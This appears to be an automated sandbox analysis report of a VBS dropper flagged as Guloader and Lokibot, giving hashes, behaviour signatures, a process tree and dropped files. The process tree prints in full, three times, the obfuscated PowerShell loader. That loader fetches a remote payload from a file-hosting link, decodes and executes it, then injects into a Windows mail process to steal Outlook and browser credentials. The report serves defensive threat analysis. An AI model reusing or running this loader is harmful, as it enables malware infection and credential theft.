Overview

overview

10

Static

static

1

EX778415591042.vbs

windows7-x64

10

EX778415591042.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-09-2024 05:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    EX778415591042.vbs

  • Size

    10KB

  • MD5

    e54e9c9586d6eb1b032b97f5ced77204

  • SHA1

    d4ef79ae803dc0cbca9e180d9cf88cce6e8d08d7

  • SHA256

    c7cc1d7877c14667c21c56547ad84a8cd7d8def57789911a559d2a28399ae43b

  • SHA512

    7030de2b60b1cdb73bde04d83824de14c434828e050ba92e4d55a7f757453fb2567feed781cb6320b10cded7cb6630627540c2f8b8f941ce0ec039f539fd7400

  • SSDEEP

    192:PxDz2esQhSJLqvYLHHCsm1Bls6Vz06Clv5eVQzN8bzUik4JO7qI7m+:JJtSqqnHGDNCv5RzN8bzUiDJel1

Score
10/10
guloaderlokibotcollectioncredential_accessdiscoverydownloaderspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EX778415591042.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Tekstbehandlingskodernes Postheat Annotering Perameles Ekskommunikeret Hortative #>;$Reflows224='Korporaler';<#Overprune smrboksenes Campisterne Teia Arguses Brakkedes #>;$solbrsaft=$host.PrivateData;If ($solbrsaft) {$Titulatur++;}function Indlevere($Zonelovstilladelser){$Decancellate=$Zonelovstilladelser.Length-$Titulatur;for( $pallers=3;$pallers -lt $Decancellate;$pallers+=4){$subbifid+=$Zonelovstilladelser[$pallers];}$subbifid;}function overtrims($Dispensate){ . ($spondylosyndesis) ($Dispensate);}$slapshot=Indlevere 'In MAnaoUndzApii d,lco l GoaDe./.tt5Gra.For0Rea or(M.tWDomiF.rndord.bsoDzuwN nsAud Di N ovT e Raa1 sn0ska.A,l0O.e;Dde HetWs.niungnRem6 s 4 u; Af Melx.ab6Met4.er;Non orGodvBov:pa 1Cu,2B,g1Bun.Bru0 n)Pis .onGsigeMetcEntkTitoo c/For2.du0Kra1Dac0Pud0ste1Int0R,t1Per BreFMagi terB aeForfJagobarxMis/Coc1F.e2spl1art.Ano0But ';$Cicoree=Indlevere 'GroUH lsBuoEdi.r Is-Arta CuGCabeBr Nt ltBi ';$Narcaciontes=Indlevere 's uhB st.vetsucp ,es ej:Bev/Bev/ s d .lr A.iAfsv steTyn.Basg sto UnoProgbaslF,beBr..d.sc UnoF rmV n/ egus icFri? OreA oxTrap EsoAskr,pktHea= Asd.rioDaawpacn HylsoloEfta Ovd el& ani ksd,en=Pt.1Ko cb.kQMat8FafosatG kauAlaw TayBeddf,nxHundC ma .kqs,iaand1Lon5sch6se,lHieQant7Cou8Udk5 KoBsysTRbeHTyrBNyhTDyklOvei InnAt,6sapQR e ';$Physiotherapies=Indlevere 'Fje>rep ';$spondylosyndesis=Indlevere 'B nIstrE R,X m ';$Hemitropy='Atmidalbumin';$Wykehamical = Indlevere 'DiseAssc UnhMu,oEta Fol% ,laUnrpst p stdPeraDe t Gnasig%Red\OkkJOx eWoruNi nDisegensKn.sBe eR s.Um.s sclKaruCr, Pro&Exo&,yp Om.estrcBeshBeno Ha Dagtson ';overtrims (Indlevere 'Aar$Uo g Afl OvoErnb ia .gl sr:BekPOrahskri B lVeroP nsun o ropsluhNyseK ad Gooa,smInt=spe(AircM nmRevd Po Chu/sclc r Bes$HouWIntyFerkCa eDilhDa,aFr mReciM sc Cua ulgdn)Co ');overtrims (Indlevere '.eg$Ging DelFo,oLicb etaE llOpi: ndlTemasy.g.ildRegeP.slsagi U nRoagAane onBlo=P r$sk NOu.as ir,rac.ebascac LaiUndo s,nIn.t sme FisEst.Pars UrpTeklTegiHyptFor(,ed$Es Pmerh Fay resPi.i FroGustTelhVerePrerLdras,npAsci,ncerefs ,n)Oph ');overtrims (Indlevere ' ,a[ rNKlae satBve.ForssaneHamrskrv Doi icPereaboP DeoCe.iBlgnEttt jMOk astenDe astagKlae VorKam]B,r:sni:C,lsPlae arca ku MorV liWestUnvy TiP anrAd oHartMetoToscBreoFasl Mo ty=s.b Ker[ U N Gre ,utTri. C,sKome esc HouHo rs.riOvetPe yEr PHaer FooBrat Unosnyc MaoRe l TiT .ry rp veeArt]ste:sta:Hi.TQuilDi sFa 1Red2Inf ');$Narcaciontes=$lagdelingen[0];$stilarterne= (Indlevere '.ar$FreGU,mLIdeOBorbDisaPr L In:TriIGenNM.tsUnbTRe A pinsemtsulLFluY,ry= ViNC tEEf wNon-preoAanBRepJBryePo cbagTMut Tals InYU as ActMeseNigm aa. E nAutEHy TFus. epWVaneMa.b.alcAntlAutIsupe .en lt');$stilarterne+=$Philosophedom[1];overtrims ($stilarterne);overtrims (Indlevere ' na$LytIDisnBnds ottOvea UnnGastcy,lUtrys.u.OveHspeeK.baTridUdseMonri.tsVar[ C.$ReaCKreiRe,cHomoAvirD.meEikesub]sol=Inf$ pis,trlTraamagpEl s lhUnho rytOui ');$Gallinae=Indlevere ' nt$ kuIPedn knsLystUnia,bdn ortEutlHelyPas. TiDkaroProwskunMaylFyloUdeaAt,dsc FU diRubl weV n(sub$ I Nstra BrrTvic apaIntc R iInkoswonimptUnde NosDec,Bli$PinMEariKrosUnrsskuiB ro TrnJuxe I rU,iesystC i)se, ';$Missioneret=$Philosophedom[0];overtrims (Indlevere ' Ba$RinGWealDefoH,vb esaMicLPar:He,sVe U A,Pel ps eeDdsT efeReirRedrRe I F NMikeDubnFam=Vlg(Unwt.oeeAuksOveT A.-D,gpTheaTaltFitHKom End$.utMMorIViks TrsLinI CaOGalNNa EstdrBukEvekt d)syn ');while (!$suppeterrinen) {overtrims (Indlevere ' ho$G,ugGrolC co Teb O a,nsl he:.ngAM lsEm ssanuMismG.le canLret Aa= De$Lept.trr,dsuChie,om ') ;overtrims $Gallinae;overtrims (Indlevere 'Mi s yst deaOv.rJa tMo,-netsKlilLeveW leHe pBrd Gen4Fur ');overtrims (Indlevere 'Men$ Vog TrlsteoHedb MeaNonlBea:WansDi uDefpOutpFeteKontB seLavrtftrFi,i MynBu estrn sk=Pr (TemT PaeEpisMictInd-PoeP veaT rt Lehsol M t$hovM Geiseps.onsAnni MooJayn eeBssr .heDirtBra) ia ') ;overtrims (Indlevere ' Dr$CatgTnkl vaoRumbDefaMonlH,i:N lAC nv GrlPadeDr,dBioy MegbratPhriIs gsmehT reOvedMole Kon Ba2Inf0 Tr9Ou = tr$QuagEjelKoroModb,itaRaplRaj:BitT rueTellPrrf CyoHemnRekm Zio Nonpart AsrManestir DinB,me.ip+ v+ a% .r$U,clTitasy g UddUndespulTeriPronOveg F e lonF x. OpcRegoVanud.enKa tPai ') ;$Narcaciontes=$lagdelingen[$Avledygtigheden209];}$sknserklringen=314125;$Peninsulas=28276;overtrims (Indlevere ' ui$.negD,ml meo orbspia,allsil:forsmisaNitu sarsamoAtrpHalo H.dBowa .u r=sej poiGUske B tBut- ReCbafo T.ntrat B eTjanR et nk H,l$Ce,Mtitistass ls Lui Reoev nTr.e orrChreTratTy. ');overtrims (Indlevere ' No$ Fag D.lVi oDucbJg aRepl Br: AnJp,eu stnLedi skoArmrA gcAlbhPlae .kf,ite InrTr Ko = s, P a[FeasFluyHo sComtIldeThomInd.ProC U o synRe,vAmpeF grHaltsfr]rig: oc:HatF E.r JooFllmpatB A,aF.ssevie,al6Pas4Ad,ss.yt Virudyi .nn apgApr(s.d$op.sPola ausavrA moTakpskioNeddAtta s )Ove ');overtrims (Indlevere 'eks$OrdgWidl co Hob igaPralHi.:KomE ResPleoE snNo aunrrGrit suhmueesolxO.h v=spa Mer[sstsIncyskrs ErtLg eDr.mAfs.smaTProe,ilxDkstAnt.EksEstunUndcGruoGo dTigiDatncelgM t]Zon:sta:HomA asUngC ViIM nIE s.Un GAreeBuntfresJ ctEl r aiiCosnMicg.ib(Pro$MavJPreu BrnAuti D o FirToucPr.hOmneAdhf teeFlarKre)Dis ');overtrims (Indlevere 'Udt$GaagUtvlRaso hbskraTeulBak:OslNReaoA,fnMasl GeeLoggDesaQuat rtoVeg=so.$ DiE s sWaso tonRdkaIagr sut lh Mae alxs c. ,nsPr,uHerb Las,dit Awr oli A n DigNos( .e$Ulns.pek pnVinsCareCh rsigkTanlstersueiImmnuskgTi,estinRen, Mi$ ToP ete Ren .niEspnDats G,uFesls.raRevs sh)Pig ');overtrims $Nonlegato;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2116
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jeunesse.slu && echo t"
        3⤵
          PID:2904
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Tekstbehandlingskodernes Postheat Annotering Perameles Ekskommunikeret Hortative #>;$Reflows224='Korporaler';<#Overprune smrboksenes Campisterne Teia Arguses Brakkedes #>;$solbrsaft=$host.PrivateData;If ($solbrsaft) {$Titulatur++;}function Indlevere($Zonelovstilladelser){$Decancellate=$Zonelovstilladelser.Length-$Titulatur;for( $pallers=3;$pallers -lt $Decancellate;$pallers+=4){$subbifid+=$Zonelovstilladelser[$pallers];}$subbifid;}function overtrims($Dispensate){ . ($spondylosyndesis) ($Dispensate);}$slapshot=Indlevere 'In MAnaoUndzApii d,lco l GoaDe./.tt5Gra.For0Rea or(M.tWDomiF.rndord.bsoDzuwN nsAud Di N ovT e Raa1 sn0ska.A,l0O.e;Dde HetWs.niungnRem6 s 4 u; Af Melx.ab6Met4.er;Non orGodvBov:pa 1Cu,2B,g1Bun.Bru0 n)Pis .onGsigeMetcEntkTitoo c/For2.du0Kra1Dac0Pud0ste1Int0R,t1Per BreFMagi terB aeForfJagobarxMis/Coc1F.e2spl1art.Ano0But ';$Cicoree=Indlevere 'GroUH lsBuoEdi.r Is-Arta CuGCabeBr Nt ltBi ';$Narcaciontes=Indlevere 's uhB st.vetsucp ,es ej:Bev/Bev/ s d .lr A.iAfsv steTyn.Basg sto UnoProgbaslF,beBr..d.sc UnoF rmV n/ egus icFri? OreA oxTrap EsoAskr,pktHea= Asd.rioDaawpacn HylsoloEfta Ovd el& ani ksd,en=Pt.1Ko cb.kQMat8FafosatG kauAlaw TayBeddf,nxHundC ma .kqs,iaand1Lon5sch6se,lHieQant7Cou8Udk5 KoBsysTRbeHTyrBNyhTDyklOvei InnAt,6sapQR e ';$Physiotherapies=Indlevere 'Fje>rep ';$spondylosyndesis=Indlevere 'B nIstrE R,X m ';$Hemitropy='Atmidalbumin';$Wykehamical = Indlevere 'DiseAssc UnhMu,oEta Fol% ,laUnrpst p stdPeraDe t Gnasig%Red\OkkJOx eWoruNi nDisegensKn.sBe eR s.Um.s sclKaruCr, Pro&Exo&,yp Om.estrcBeshBeno Ha Dagtson ';overtrims (Indlevere 'Aar$Uo g Afl OvoErnb ia .gl sr:BekPOrahskri B lVeroP nsun o ropsluhNyseK ad Gooa,smInt=spe(AircM nmRevd Po Chu/sclc r Bes$HouWIntyFerkCa eDilhDa,aFr mReciM sc Cua ulgdn)Co ');overtrims (Indlevere '.eg$Ging DelFo,oLicb etaE llOpi: ndlTemasy.g.ildRegeP.slsagi U nRoagAane onBlo=P r$sk NOu.as ir,rac.ebascac LaiUndo s,nIn.t sme FisEst.Pars UrpTeklTegiHyptFor(,ed$Es Pmerh Fay resPi.i FroGustTelhVerePrerLdras,npAsci,ncerefs ,n)Oph ');overtrims (Indlevere ' ,a[ rNKlae satBve.ForssaneHamrskrv Doi icPereaboP DeoCe.iBlgnEttt jMOk astenDe astagKlae VorKam]B,r:sni:C,lsPlae arca ku MorV liWestUnvy TiP anrAd oHartMetoToscBreoFasl Mo ty=s.b Ker[ U N Gre ,utTri. C,sKome esc HouHo rs.riOvetPe yEr PHaer FooBrat Unosnyc MaoRe l TiT .ry rp veeArt]ste:sta:Hi.TQuilDi sFa 1Red2Inf ');$Narcaciontes=$lagdelingen[0];$stilarterne= (Indlevere '.ar$FreGU,mLIdeOBorbDisaPr L In:TriIGenNM.tsUnbTRe A pinsemtsulLFluY,ry= ViNC tEEf wNon-preoAanBRepJBryePo cbagTMut Tals InYU as ActMeseNigm aa. E nAutEHy TFus. epWVaneMa.b.alcAntlAutIsupe .en lt');$stilarterne+=$Philosophedom[1];overtrims ($stilarterne);overtrims (Indlevere ' na$LytIDisnBnds ottOvea UnnGastcy,lUtrys.u.OveHspeeK.baTridUdseMonri.tsVar[ C.$ReaCKreiRe,cHomoAvirD.meEikesub]sol=Inf$ pis,trlTraamagpEl s lhUnho rytOui ');$Gallinae=Indlevere ' nt$ kuIPedn knsLystUnia,bdn ortEutlHelyPas. TiDkaroProwskunMaylFyloUdeaAt,dsc FU diRubl weV n(sub$ I Nstra BrrTvic apaIntc R iInkoswonimptUnde NosDec,Bli$PinMEariKrosUnrsskuiB ro TrnJuxe I rU,iesystC i)se, ';$Missioneret=$Philosophedom[0];overtrims (Indlevere ' Ba$RinGWealDefoH,vb esaMicLPar:He,sVe U A,Pel ps eeDdsT efeReirRedrRe I F NMikeDubnFam=Vlg(Unwt.oeeAuksOveT A.-D,gpTheaTaltFitHKom End$.utMMorIViks TrsLinI CaOGalNNa EstdrBukEvekt d)syn ');while (!$suppeterrinen) {overtrims (Indlevere ' ho$G,ugGrolC co Teb O a,nsl he:.ngAM lsEm ssanuMismG.le canLret Aa= De$Lept.trr,dsuChie,om ') ;overtrims $Gallinae;overtrims (Indlevere 'Mi s yst deaOv.rJa tMo,-netsKlilLeveW leHe pBrd Gen4Fur ');overtrims (Indlevere 'Men$ Vog TrlsteoHedb MeaNonlBea:WansDi uDefpOutpFeteKontB seLavrtftrFi,i MynBu estrn sk=Pr (TemT PaeEpisMictInd-PoeP veaT rt Lehsol M t$hovM Geiseps.onsAnni MooJayn eeBssr .heDirtBra) ia ') ;overtrims (Indlevere ' Dr$CatgTnkl vaoRumbDefaMonlH,i:N lAC nv GrlPadeDr,dBioy MegbratPhriIs gsmehT reOvedMole Kon Ba2Inf0 Tr9Ou = tr$QuagEjelKoroModb,itaRaplRaj:BitT rueTellPrrf CyoHemnRekm Zio Nonpart AsrManestir DinB,me.ip+ v+ a% .r$U,clTitasy g UddUndespulTeriPronOveg F e lonF x. OpcRegoVanud.enKa tPai ') ;$Narcaciontes=$lagdelingen[$Avledygtigheden209];}$sknserklringen=314125;$Peninsulas=28276;overtrims (Indlevere ' ui$.negD,ml meo orbspia,allsil:forsmisaNitu sarsamoAtrpHalo H.dBowa .u r=sej poiGUske B tBut- ReCbafo T.ntrat B eTjanR et nk H,l$Ce,Mtitistass ls Lui Reoev nTr.e orrChreTratTy. ');overtrims (Indlevere ' No$ Fag D.lVi oDucbJg aRepl Br: AnJp,eu stnLedi skoArmrA gcAlbhPlae .kf,ite InrTr Ko = s, P a[FeasFluyHo sComtIldeThomInd.ProC U o synRe,vAmpeF grHaltsfr]rig: oc:HatF E.r JooFllmpatB A,aF.ssevie,al6Pas4Ad,ss.yt Virudyi .nn apgApr(s.d$op.sPola ausavrA moTakpskioNeddAtta s )Ove ');overtrims (Indlevere 'eks$OrdgWidl co Hob igaPralHi.:KomE ResPleoE snNo aunrrGrit suhmueesolxO.h v=spa Mer[sstsIncyskrs ErtLg eDr.mAfs.smaTProe,ilxDkstAnt.EksEstunUndcGruoGo dTigiDatncelgM t]Zon:sta:HomA asUngC ViIM nIE s.Un GAreeBuntfresJ ctEl r aiiCosnMicg.ib(Pro$MavJPreu BrnAuti D o FirToucPr.hOmneAdhf teeFlarKre)Dis ');overtrims (Indlevere 'Udt$GaagUtvlRaso hbskraTeulBak:OslNReaoA,fnMasl GeeLoggDesaQuat rtoVeg=so.$ DiE s sWaso tonRdkaIagr sut lh Mae alxs c. ,nsPr,uHerb Las,dit Awr oli A n DigNos( .e$Ulns.pek pnVinsCareCh rsigkTanlstersueiImmnuskgTi,estinRen, Mi$ ToP ete Ren .niEspnDats G,uFesls.raRevs sh)Pig ');overtrims $Nonlegato;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2460
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Tekstbehandlingskodernes Postheat Annotering Perameles Ekskommunikeret Hortative #>;$Reflows224='Korporaler';<#Overprune smrboksenes Campisterne Teia Arguses Brakkedes #>;$solbrsaft=$host.PrivateData;If ($solbrsaft) {$Titulatur++;}function Indlevere($Zonelovstilladelser){$Decancellate=$Zonelovstilladelser.Length-$Titulatur;for( $pallers=3;$pallers -lt $Decancellate;$pallers+=4){$subbifid+=$Zonelovstilladelser[$pallers];}$subbifid;}function overtrims($Dispensate){ . ($spondylosyndesis) ($Dispensate);}$slapshot=Indlevere 'In MAnaoUndzApii d,lco l GoaDe./.tt5Gra.For0Rea or(M.tWDomiF.rndord.bsoDzuwN nsAud Di N ovT e Raa1 sn0ska.A,l0O.e;Dde HetWs.niungnRem6 s 4 u; Af Melx.ab6Met4.er;Non orGodvBov:pa 1Cu,2B,g1Bun.Bru0 n)Pis .onGsigeMetcEntkTitoo c/For2.du0Kra1Dac0Pud0ste1Int0R,t1Per BreFMagi terB aeForfJagobarxMis/Coc1F.e2spl1art.Ano0But ';$Cicoree=Indlevere 'GroUH lsBuoEdi.r Is-Arta CuGCabeBr Nt ltBi ';$Narcaciontes=Indlevere 's uhB st.vetsucp ,es ej:Bev/Bev/ s d .lr A.iAfsv steTyn.Basg sto UnoProgbaslF,beBr..d.sc UnoF rmV n/ egus icFri? OreA oxTrap EsoAskr,pktHea= Asd.rioDaawpacn HylsoloEfta Ovd el& ani ksd,en=Pt.1Ko cb.kQMat8FafosatG kauAlaw TayBeddf,nxHundC ma .kqs,iaand1Lon5sch6se,lHieQant7Cou8Udk5 KoBsysTRbeHTyrBNyhTDyklOvei InnAt,6sapQR e ';$Physiotherapies=Indlevere 'Fje>rep ';$spondylosyndesis=Indlevere 'B nIstrE R,X m ';$Hemitropy='Atmidalbumin';$Wykehamical = Indlevere 'DiseAssc UnhMu,oEta Fol% ,laUnrpst p stdPeraDe t Gnasig%Red\OkkJOx eWoruNi nDisegensKn.sBe eR s.Um.s sclKaruCr, Pro&Exo&,yp Om.estrcBeshBeno Ha Dagtson ';overtrims (Indlevere 'Aar$Uo g Afl OvoErnb ia .gl sr:BekPOrahskri B lVeroP nsun o ropsluhNyseK ad Gooa,smInt=spe(AircM nmRevd Po Chu/sclc r Bes$HouWIntyFerkCa eDilhDa,aFr mReciM sc Cua ulgdn)Co ');overtrims (Indlevere '.eg$Ging DelFo,oLicb etaE llOpi: ndlTemasy.g.ildRegeP.slsagi U nRoagAane onBlo=P r$sk NOu.as ir,rac.ebascac LaiUndo s,nIn.t sme FisEst.Pars UrpTeklTegiHyptFor(,ed$Es Pmerh Fay resPi.i FroGustTelhVerePrerLdras,npAsci,ncerefs ,n)Oph ');overtrims (Indlevere ' ,a[ rNKlae satBve.ForssaneHamrskrv Doi icPereaboP DeoCe.iBlgnEttt jMOk astenDe astagKlae VorKam]B,r:sni:C,lsPlae arca ku MorV liWestUnvy TiP anrAd oHartMetoToscBreoFasl Mo ty=s.b Ker[ U N Gre ,utTri. C,sKome esc HouHo rs.riOvetPe yEr PHaer FooBrat Unosnyc MaoRe l TiT .ry rp veeArt]ste:sta:Hi.TQuilDi sFa 1Red2Inf ');$Narcaciontes=$lagdelingen[0];$stilarterne= (Indlevere '.ar$FreGU,mLIdeOBorbDisaPr L In:TriIGenNM.tsUnbTRe A pinsemtsulLFluY,ry= ViNC tEEf wNon-preoAanBRepJBryePo cbagTMut Tals InYU as ActMeseNigm aa. E nAutEHy TFus. epWVaneMa.b.alcAntlAutIsupe .en lt');$stilarterne+=$Philosophedom[1];overtrims ($stilarterne);overtrims (Indlevere ' na$LytIDisnBnds ottOvea UnnGastcy,lUtrys.u.OveHspeeK.baTridUdseMonri.tsVar[ C.$ReaCKreiRe,cHomoAvirD.meEikesub]sol=Inf$ pis,trlTraamagpEl s lhUnho rytOui ');$Gallinae=Indlevere ' nt$ kuIPedn knsLystUnia,bdn ortEutlHelyPas. TiDkaroProwskunMaylFyloUdeaAt,dsc FU diRubl weV n(sub$ I Nstra BrrTvic apaIntc R iInkoswonimptUnde NosDec,Bli$PinMEariKrosUnrsskuiB ro TrnJuxe I rU,iesystC i)se, ';$Missioneret=$Philosophedom[0];overtrims (Indlevere ' Ba$RinGWealDefoH,vb esaMicLPar:He,sVe U A,Pel ps eeDdsT efeReirRedrRe I F NMikeDubnFam=Vlg(Unwt.oeeAuksOveT A.-D,gpTheaTaltFitHKom End$.utMMorIViks TrsLinI CaOGalNNa EstdrBukEvekt d)syn ');while (!$suppeterrinen) {overtrims (Indlevere ' ho$G,ugGrolC co Teb O a,nsl he:.ngAM lsEm ssanuMismG.le canLret Aa= De$Lept.trr,dsuChie,om ') ;overtrims $Gallinae;overtrims (Indlevere 'Mi s yst deaOv.rJa tMo,-netsKlilLeveW leHe pBrd Gen4Fur ');overtrims (Indlevere 'Men$ Vog TrlsteoHedb MeaNonlBea:WansDi uDefpOutpFeteKontB seLavrtftrFi,i MynBu estrn sk=Pr (TemT PaeEpisMictInd-PoeP veaT rt Lehsol M t$hovM Geiseps.onsAnni MooJayn eeBssr .heDirtBra) ia ') ;overtrims (Indlevere ' Dr$CatgTnkl vaoRumbDefaMonlH,i:N lAC nv GrlPadeDr,dBioy MegbratPhriIs gsmehT reOvedMole Kon Ba2Inf0 Tr9Ou = tr$QuagEjelKoroModb,itaRaplRaj:BitT rueTellPrrf CyoHemnRekm Zio Nonpart AsrManestir DinB,me.ip+ v+ a% .r$U,clTitasy g UddUndespulTeriPronOveg F e lonF x. OpcRegoVanud.enKa tPai ') ;$Narcaciontes=$lagdelingen[$Avledygtigheden209];}$sknserklringen=314125;$Peninsulas=28276;overtrims (Indlevere ' ui$.negD,ml meo orbspia,allsil:forsmisaNitu sarsamoAtrpHalo H.dBowa .u r=sej poiGUske B tBut- ReCbafo T.ntrat B eTjanR et nk H,l$Ce,Mtitistass ls Lui Reoev nTr.e orrChreTratTy. ');overtrims (Indlevere ' No$ Fag D.lVi oDucbJg aRepl Br: AnJp,eu stnLedi skoArmrA gcAlbhPlae .kf,ite InrTr Ko = s, P a[FeasFluyHo sComtIldeThomInd.ProC U o synRe,vAmpeF grHaltsfr]rig: oc:HatF E.r JooFllmpatB A,aF.ssevie,al6Pas4Ad,ss.yt Virudyi .nn apgApr(s.d$op.sPola ausavrA moTakpskioNeddAtta s )Ove ');overtrims (Indlevere 'eks$OrdgWidl co Hob igaPralHi.:KomE ResPleoE snNo aunrrGrit suhmueesolxO.h v=spa Mer[sstsIncyskrs ErtLg eDr.mAfs.smaTProe,ilxDkstAnt.EksEstunUndcGruoGo dTigiDatncelgM t]Zon:sta:HomA asUngC ViIM nIE s.Un GAreeBuntfresJ ctEl r aiiCosnMicg.ib(Pro$MavJPreu BrnAuti D o FirToucPr.hOmneAdhf teeFlarKre)Dis ');overtrims (Indlevere 'Udt$GaagUtvlRaso hbskraTeulBak:OslNReaoA,fnMasl GeeLoggDesaQuat rtoVeg=so.$ DiE s sWaso tonRdkaIagr sut lh Mae alxs c. ,nsPr,uHerb Las,dit Awr oli A n DigNos( .e$Ulns.pek pnVinsCareCh rsigkTanlstersueiImmnuskgTi,estinRen, Mi$ ToP ete Ren .niEspnDats G,uFesls.raRevs sh)Pig ');overtrims $Nonlegato;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2112
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jeunesse.slu && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2872
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:3008

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Jeunesse.slu
      Filesize

      445KB

      MD5

      8383998e368af99410a50d584700e574

      SHA1

      e4649baea84eb0e2447b3baa92e26679f006fd1d

      SHA256

      973f06e73b2965628d563d835b5e2b099f159c0ff3f1f1e139aa514b1bcefde1

      SHA512

      bc8de24ef4f920c49b0af99114eba2d7741c9d355c2f732e8bcb593b11d98d3989fa4990985691b3efee430b3df43f1fbf3f4c7d361883b5440af532c092968a

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2
      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BJUJLSF4CVXXR4SB6R2X.temp
      Filesize

      7KB

      MD5

      2a2f697948cc229348b43645b6294be5

      SHA1

      4ee00c42f4d81e1828e2217a00f24be6b965c70c

      SHA256

      1c29cabcff036fc63cd26671312674d752b8ddfa5ab578b79f682165867e416d

      SHA512

      7ce863db6028e022d16d723d3dbfa9a72fb2195de967e2362802a8f69882a858e74aba5336a1e14c82564ab02f2c579f0038d08796e49968c4aa83fbc25990d6

      Download Submit

    • memory/2112-19-0x0000000006260000-0x000000000A127000-memory.dmp

      Filesize

      62.8MB

      Download

    • memory/2116-8-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2116-9-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2116-10-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2116-11-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2116-13-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2116-14-0x000007FEF45FE000-0x000007FEF45FF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2116-4-0x000007FEF45FE000-0x000007FEF45FF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2116-7-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2116-6-0x0000000002410000-0x0000000002418000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2116-46-0x000007FEF4340000-0x000007FEF4CDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2116-5-0x000000001B270000-0x000000001B552000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/3008-22-0x0000000000970000-0x0000000004837000-memory.dmp

      Filesize

      62.8MB

      Download

    • memory/3008-44-0x0000000000970000-0x0000000004837000-memory.dmp

      Filesize

      62.8MB

      Download